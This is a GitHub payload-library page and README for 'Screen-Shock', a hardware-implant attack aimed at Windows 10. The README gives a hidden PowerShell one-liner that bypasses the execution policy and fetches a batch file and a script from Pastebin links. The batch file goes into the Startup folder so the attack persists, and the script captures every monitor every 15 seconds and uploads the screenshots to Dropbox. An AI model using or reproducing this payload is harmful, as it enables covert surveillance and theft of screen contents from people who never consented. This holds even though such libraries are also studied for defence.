omg-payloads/payloads/library/exfiltration/Screen-Shock
atomic a3f3739810
Update c.ps1
2022-09-07 22:41:27 -04:00
..
I.bat Add files via upload 2022-09-07 19:56:13 -04:00
README.md Add files via upload 2022-09-07 19:56:13 -04:00
c.ps1 Update c.ps1 2022-09-07 22:41:27 -04:00
payload.txt Add files via upload 2022-09-07 19:56:13 -04:00
placeholder Add files via upload 2022-09-07 19:56:13 -04:00

README.md

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Screen-Shock

This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)

Description

This payload uses iwr to download 2 files

  • I.bat
  • c.ps1

I.bat is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup

c.ps1 will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds

Then the contents will then be sent to the DropBox for viewing pleasure

Getting Started

Dependencies

  • Pastebin or other file sharing service, Dropbox
  • Windows 10
  • Here is a tutorial on how to use DropBox-Upload

(back to top)

Executing program

  • Plug in your device
  • Device will download both files and place them in proper directories to then run the script
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""

(back to top)

Contributing

All contributors names will be listed here:

atomiczsec

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

Acknowledgments

(back to top)